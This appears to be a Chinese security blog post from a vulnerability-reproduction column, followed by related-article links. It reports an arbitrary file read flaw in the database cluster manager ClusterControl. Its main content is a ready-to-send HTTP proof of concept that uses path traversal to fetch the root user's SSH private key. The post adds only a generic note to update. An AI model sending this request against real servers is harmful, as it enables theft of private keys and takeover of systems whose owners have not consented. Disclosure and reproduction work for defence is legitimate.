ClusterControl存在任意文件读取

原创已于 2025-05-17 10:40:49 修改 · 267 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #网络 #web安全 #漏洞库 #漏洞复现 #渗透测试 #安全威胁分析

于 2025-05-16 16:31:46 首次发布

漏洞复现专栏收录该内容

181 篇文章

订阅专栏

问题描述

ClusterControl 作为一款数据库集群管理与监控工具，近日被发现存在任意文件读取。该问题使攻击者能够访问服务器上的任意文件，存在数据泄露的风险。

影响版本

该问题影响 ClusterControl 的多个版本，具体版本号需参考官方公告或安全报告。

poc

GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
Host: 
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4

修复建议

及时更新到最新版本，官方通常会在发现问题后发布修复补丁。确保系统运行的是最新版本，以避免受到该问题的影响。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Sword-heart

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Apache Flink (最新版本) 远程代码执行

应无所住而生其心

05-04

1096

路虽远，行则将至；事虽难，做则必成

ClusterControl CMON API存在目录遍历漏洞(CVE-2024-41628)

最新发布

缘梦未来的博客

02-08

280

ClusterControl 是一款由 Severalnines 开发的无代理数据库集群管理和自动化软件。它支持多种数据库系统，包括 MySQL、MariaDB、PostgreSQL、MongoDB 等，旨在简化数据库的部署、监控、管理和扩展。

参与评论您还未登录，请先登录后发表或查看评论

ClusterControl部署PostgreSQL主从复制集群

03-04

5061

ClusterControl主从方案 ClusterControl简介 ClusterControl是一个用于数据库集群的无代理管理和自动化软件。它有助于直接从其用户界面部署，监视，管理和扩展数据库服务器/集群。ClusterControl能够处理维护数据库服务器或集群所需的大多数管理任务。使用ClusterControl，您可以：在您选择的技术堆栈上部署独立，复制或集群数据库。在...

[文件读取]对任意文件读取漏洞理解

wj33333的博客

11-14

540

任意文件读取漏洞

open source软件：Clustercontrol介绍（DBaaS）

junming_zhao的博客

10-09

1473

1. 介绍 ClusterControl is an agentless management and automation software for database clusters. It helps deploy, monitor, manage and scale your database server/cluster directly from ClusterControl use...

某集群管理系统存在任意文件读取漏洞

应无所住而生其心

09-22

426

你为什么要拼命努力？父母的白发，想去的地方很远，想要的东西很贵，喜欢的人很优秀，周围人的嘲笑，以及，天生傲骨。

精选资源

jQuery-1.7.2任意文件读取漏洞验证利用脚本

04-27

jQuery是一个快速、简洁的JavaScript框架，丰富的Javascript代码库，在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞，攻击者可通过前台读取任意文件。

精选资源

泛微云桥 e-Bridge 任意文件读取.md

04-11

泛微云桥 e-Bridge 任意文件读取

华天动力OA downloadWpsFile.jsp 任意文件读取漏洞复现

0xSec

07-26

782

华天动力OAdownloadWpsFile.jsp 接口处存在任意文件读取漏洞，未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件，使系统处于极不安全的状态。

九思OA dl.jsp 任意文件读取漏洞复现

0xSec

11-14

997

北京九思协同办公软件dl.jsp接口处存在任意文件读取漏洞，攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

集群管理工具 ClusterShell官方只用文档

10-23

集群管理工具clustershell的官方文档

【数据库】主流数据库及其常用工具简单科普

FixPng的博客

04-04

4857

最近面试发现自己水平还是不足，对除mysql和oracle以外的数据库并不怎么了解，在此借助通义千文先给自己简单科普一下。

理解MySQL中的锁粒度

m0_65012566的博客

03-10

321

每个MySQL存储引擎都支持不同级别的锁粒度。MySQL有三个锁级别：行级锁、页级锁和表级锁。每个MySQL存储引擎实现锁定的方式都不同，都有一些明显的优点和缺点。我们将首先研究锁粒度是什么，然后研究不同存储引擎中的一切是如何工作的。广义地说，MySQL中的锁属于这些类别之一。页面级别–这种类型的锁粒度在MySQL的旧引擎中可用，特别是BDB 在MySQL 5.1中已经过时。此处不再讨论。表级别–MySQL对除InnoDB之外的所有存储引擎使用表级别锁定。行级别–行级别锁定由InnoDB使用。

ClusterControl DB 集群测试

weixin_34221276的博客

01-09

313

一、摘要分别在北京、日本、美国部署3台MySQLDB，组成一个Cluster，测试DB集群的健壮性。Controller：10.13.25.254 北京Nodes：10.13.25.2—北京10.13.25.3—北京10.13.25.4—北京10.13.5.2—日本10.13.5.3—日本10.13.5.4—日本10.13.13.2—美国10.13.13.3—美国10.13....

HW漏洞威胁情报第一天|HW情报

weixin_43167326的博客

07-24

676

技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！蓝凌EKP存在sys_ui_component远程命令执行漏洞亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞。

ClusterControl

机会是留给有准备的人的

09-21

1228

ClusterControl Docker操作 1.docker pull severalnines/clustercontrol 2.docker run -d --name ClusterControl -p 5000:80 severalnines/clustercontrol 3.docker logs -f ClusterControl 4.docker run -d --name M

推荐5个优秀的Mongodb 可视化管理工具